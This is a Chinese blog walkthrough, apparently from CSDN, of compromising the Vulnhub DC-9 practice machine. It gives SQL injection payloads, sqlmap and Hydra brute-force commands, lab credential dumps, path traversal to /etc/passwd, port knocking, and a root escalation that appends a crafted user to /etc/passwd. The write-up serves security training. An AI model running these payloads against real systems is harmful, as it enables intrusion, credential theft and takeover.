Vulhub-DC-9靶场实战攻略

最新推荐文章于 2024-03-29 17:12:37 发布
最新推荐文章于 2024-03-29 17:12:37 发布
阅读量428 收藏
点赞数
分类专栏: 靶场与CTF系列 文章标签: 安全 web安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123541405
版权

首先正常通过arp-scan进行主机发现  然后nmap扫描得到开放端口

之后访问界面  各种尝试后猜测search界面存在sql注入

接下来通过burp抓包 修改search的参数  为了看清到底有没有报错出现  可以通过搜索正确的内容 例如Mary用于后期判断闭合以及是否注入

search=Mary' order by 6 --+

search=Mary' order by 7 --+

search=Mary' union select 1,2,3,4,5,6 --+

search=Mary' union select 1,database(),3,4,5,6 --+     //Staff

search=Mary' union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() --+  //StaffDetails Users



search=Mary' union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='Users' --+

search=Mary' union select 1,group_concat(Username),group_concat(Password),4,5,6 from Users --+

Mary:Moe

admin:856f5de590ef37314e7c3bdf6f8a66dc

可以借助MD5在线解密工具

https://www.somd5.com/

admin

transorbital1

直接进入后台之前 不妨尝试一下使用sqlmap对数据库进行扫描看看

由于是POST的形式 我们不妨先通过burp抓包 然后把包进行保存

我们放到kali的/home/kali目录下

vi post.txt

sqlmap -r post.txt --dbs

sqlmap -r post.txt -D users --tables

sqlmap -r post.txt -D users -T UserDetails --dump

不同点  SQL手工注入的时候 使用的当前数据库是Staff  之后只有两个用户  这里通过sqlmap扫描了另一个数据库users 查看到了所有用户账号和密码

id   | lastname   | reg_date            | username  | firstname | password      |

+------+------------+---------------------+-----------+-----------+---------------+

| 10   | Tribbiani  | 2019-12-29 16:58:26 | joeyt     | Joey      | Passw0rd      |

| 11   | Green      | 2019-12-29 16:58:26 | rachelg   | Rachel    | yN72#dsd      |

| 12   | Geller     | 2019-12-29 16:58:26 | rossg     | Ross      | ILoveRachel   |

| 13   | Geller     | 2019-12-29 16:58:26 | monicag   | Monica    | 3248dsds7s    |

| 14   | Buffay     | 2019-12-29 16:58:26 | phoebeb   | Phoebe    | smellycats    |

| 15   | McScoots   | 2019-12-29 16:58:26 | scoots    | Scooter   | YR3BVxxxw87   |

| 16   | Trump      | 2019-12-29 16:58:26 | janitor   | Donald    | Ilovepeepee   |

| 17   | Morrison   | 2019-12-29 16:58:28 | janitor2  | Scott     | Hawaii-Five-0 |

| 1    | Moe        | 2019-12-29 16:58:26 | marym     | Mary      | 3kfs86sfd     |

| 2    | Dooley     | 2019-12-29 16:58:26 | julied    | Julie     | 468sfdfsd2    |

| 3    | Flintstone | 2019-12-29 16:58:26 | fredf     | Fred      | 4sfd87sfd1    |

| 4    | Rubble     | 2019-12-29 16:58:26 | barneyr   | Barney    | RocksOff      |

| 5    | Cat        | 2019-12-29 16:58:26 | tomc      | Tom       | TC&TheBoyz    |

| 6    | Mouse      | 2019-12-29 16:58:26 | jerrym    | Jerry     | B8m#48sd      |

| 7    | Flintstone | 2019-12-29 16:58:26 | wilmaf    | Wilma     | Pebbles       |

| 8    | Rubble     | 2019-12-29 16:58:26 | bettyr    | Betty     | BamBam01      |

| 9    | Bing       | 2019-12-29 16:58:26 | chandlerb | Chandler  | UrAG0D!       |

不妨在/home/kali下保存两个txt 分别存放用户名和密码 以免后续爆破ssh需要用到

joeyt

rachelg

rossg

monicag

phoebeb

scoots

janitor

janitor2

marym

julied

fredf

barneyr

tomc

jerrym

wilmaf

bettyr

chandlerb
Passw0rd

yN72#dsd

ILoveRachel

3248dsds7s

smellycats

YR3BVxxxw87

Ilovepeepee

Hawaii-Five-0

3kfs86sfd

468sfdfsd2  

4sfd87sfd1

RocksOff

TC&TheBoyz  

B8m#48sd

Pebbles

BamBam01

UrAG0D!

之后使用该管理员用户登录进入后台

接下来可以通过burp进行爆破 尝试找出是否存在文件包含  以及包含的参数名和文件名

字典选择:

payload1 SimpleLIst  Filenames long和Filenames short

payload2 SimpleList  Fuzzing quick和Fuzzing full

爆破比较缓慢这里不多赘述

根据经验 这里参数大概率可能是file  这里目录可以尝试下能否包含到密码文件

http://192.168.206.144/manage.php?file=../../../../../../../etc/passwd

根据常识得知 最开始的22端口没有办法被探测到的原因是使用了knockd

接下来可以借助文件包含我们查看一下knockd的配置文件

默认位置在

/etc/knockd.conf

192.168.206.144/manage.php?file=../../../../../../../etc/knockd.conf

也就是说可以通过命中7469 8475 9842来进行ssh链接  通过命中9842 8475 7469进行ssh链接的关闭

接下来可以通过nmap或者nc进行敲门

nc 192.168.206.144 7469

nc 192.168.206.144 8475

nc 192.168.206.144 9842

nmap -p 22 192.168.206.144

或者

nmap -p 7469 192.168.206.144

nmap -p 8475 192.168.206.144

nmap -p 9842 192.168.206.144

nmap -p 22 192.168.206.144

之后22号端口也就开放了

接下来我们通过hydra对其进行ssh爆破

hydra -L user.txt -P pass.txt 192.168.206.144 ssh

joeyt   Passw0rd

janitor    Ilovepeepee

chandlerb   UrAG0D!

ssh joeyt@192.168.206.144

ssh janitor@192.168.206.144

PS:以上3个用户均尝试过sudo -l  并没有存在可以root权限执行的内容

接下来不妨保存一下这些密码 然后重新进行一次ssh爆破 看看有没有什么收获

BamBam01

Passw0rd

smellycats

P0Lic#10-4

B4-Tru3-001

4uGU5T-NiGHts

hydra -L user.txt -P pass.txt 192.168.206.144 ssh

[22][ssh] host: 192.168.206.144   login: joeyt   password: Passw0rd

[22][ssh] host: 192.168.206.144   login: fredf   password: B4-Tru3-001

ssh fredf@192.168.206.144

sudo -l

会将第一个参数的内容写到第二个参数的末尾

根据相应python文件的提示  我们不妨考虑一下 新建一个root权限的用户 借助py文件把其写入passwd文件即可实现提权

我们借助工具openssl对密码进行加密处理

openssl passwd -1 -salt admin 123456

-1 是使用md5算法进行加密  那个是1

-salt  自动插入一个随机数作为文件内容加密

admin和123456  是用户名和密码

$1$admin$LClYcRe.ee8dQwgrFc5nz.

之后按照/etc/passwd的格式修改一下  保存到某个文件中

admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd

cd /opt/devstuff/dist/test

sudo ./test /tmp/passwd /etc/passwd

su admin

#123456

cd /root

此时已经提权成功  成功获得了flag

Simon_Smith
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶场实战---DC-9
一期一会的博客
12-23 2270
​ 0x00 环境准备 1.官网下载地址: https://www.vulnhub.com/entry/dc-9,412/ 2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.132) 0x01 信息收集 老办法,使用arp-scan -l 找到目标主机,目标主机ip为192.168.88.132 查看开放端口,22端口被过滤,登录80端口查看 nmap -sV -p- -A 192.168.88.
Vulhub-DC-1靶场实战
weixin_47118413的博客
07-06 2161
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
DC-9靶场
mlws1900的博客
03-29 771
发现靶机的ip地址为192.168.111.137,攻击机(kali)的ip地址为192.168.111.128。,而且需要按照顺序‘敲’端口。登录成功,下面显示file does not exist ,怀疑包含了某文件,所以尝试文件包含。将这一串密码加入刚刚的爆破密码中,重新进行爆破,生成newpass.txt。openssl生成密码,前一个mlws为账号,后一个1900为要加密的密码。发现代码作用需要两个文件,把第一文件追加到第二个文件后。使用test文件,将该文件的内容写入到passwd中。
靶场练习第十七天~vulnhub靶场dc-9
qq_57976347的博客
02-16 808
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-9.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.122 2.网站的信息收集 (1)靶机开放了80端口,先访问
靶机实操:vulnhub-DC9
不想当脚本小子的脚本小子
01-07 303
先:IP为192.168.40.132,开放了22和80端口,服务器为apache2.4.38(到时候搜一下有没有漏洞),robots.txt里啥都没有,浏览了一下网页,几个界面都是php,有一个登录界面。dirbuster扫一下看什么结果: ...
Vulhub-DC-7靶场实战攻略
weixin_51339377的博客
03-17 202
arp-scan -l nmap -T4 -A 192.168.206.141 PS:ssh链接成功 接下来可以直接链接mysql 然后查看用户 改掉密码就可以登录后台了 也可以借鉴下面这个思路 通过drush重置密码 进入/var/www/html/ 目录下以后 由于是Drupal搭建的网站 计划任务用到了drush 可以尝试如下的命令重置登录密码和用户 drush user-password admin --password="abcdefg"...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-8实战
最新发布
05-31
vuInhub靶场实战系列-DC-8实战
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
vuInhub靶场实战系列-DC-5实战
05-27
vuInhub靶场实战系列-DC-5实战
Vulhub-DC-5靶场实战攻略
weixin_51339377的博客
03-17 302
基于以上变化 考虑burp抓个包进行分析 尝试思路1:通过爆破去发现这个网站有哪些文件可以浏览 字典部分添加Filenames-short 和Filenames-long http://192.168.206.139/thankyou.php?file=../../../../../../../../../etc/passwd Nginx日志位置: /var/log/nginx/error.log ...
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL
LYJ20010728的博客
08-27 369
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL题目描述环境下载FUNBOX: NEXT LEVEL靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! If you need hints, call me on twitter: @0815R2d2 Have
VulnhubDC9
大方子
01-16 5377
靶机下载地址:http://www.five86.com/downloads/DC-9.zip 主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.168.56.1/24 用nmap对主机进行排查确定,DC9的IP地址为192.168.56.112 可以看到DC开放了80端口以及22端口(被过滤) nmap -sC -sV -oA dc-9 192.168.56
Vulnhub靶机DC系列-DC-9
m0_54525483的博客
01-13 2660
Vulnhub靶机DC系列-DC-9 靶场环境 靶场名称:DC-9 靶场地址:https://www.vulnhub.com/entry/dc-9,412/ 下载地址: DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9.zip Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip Download (Torrent): https://download
DC9靶场渗透
qq_20032803的博客
02-03 582
1.发现主机/扫描 root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.100.128 netmask 255.255.255.0 broadcast 192.168.100.255 inet6 fe80::20c:29ff:fe72:6e3e prefixlen 64 scopeid 0x20<link>
EVM: 1-Walkthrough【VulnHub靶场】渗透测试实战系列2
重新启程
12-03 539
靶场地址:EVM: 1 这个靶机比较特殊的地方,不是用dhcp生成地址,必须用host网络,靶机的地址必须为192.168.56.103。 至于怎么做到,小伙伴自行脑补,有助于手臂锻炼。呵呵! 搞定上面的准备工作之后,拿出kali,先扫一下地址和端口: 用enum4linux对smb扫描了一下,没有什么特别有用的信息 就直接打开80web看看情况,扫描了一下目录,发现有word...
DC-9 靶场
wcl20010的博客
05-02 807
靶机地址:链接:https://pan.baidu.com/s/1kMLviFtz2JosS422-L1Tgw 提取码:c5ur 1.主机发现 nmap -sP 192.168.128.1/24 arp-scan -l #得到IP 192.168.128.131 2.端口扫描 nmap -p 1-65535 -A 192.168.128.131 # 22 80端口 3.目录扫描 dirb http://192.168.128.131...
vulhub靶场学习日记DC9
m0_55763479的博客
09-07 1127
vulhub靶场学习日记DC9
硬件设计实战系列(二)之DC-DC电源设计
07-27
欢迎阅读硬件设计实战系列(二)之DC-DC电源。在这篇文章中,我将介绍一些关于DC-DC电源设计的实战知识。 1. 首先,什么是DC-DC电源? DC-DC电源是将直流电能转换为不同电压或电流的装置。它通常由开关电源或线性...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值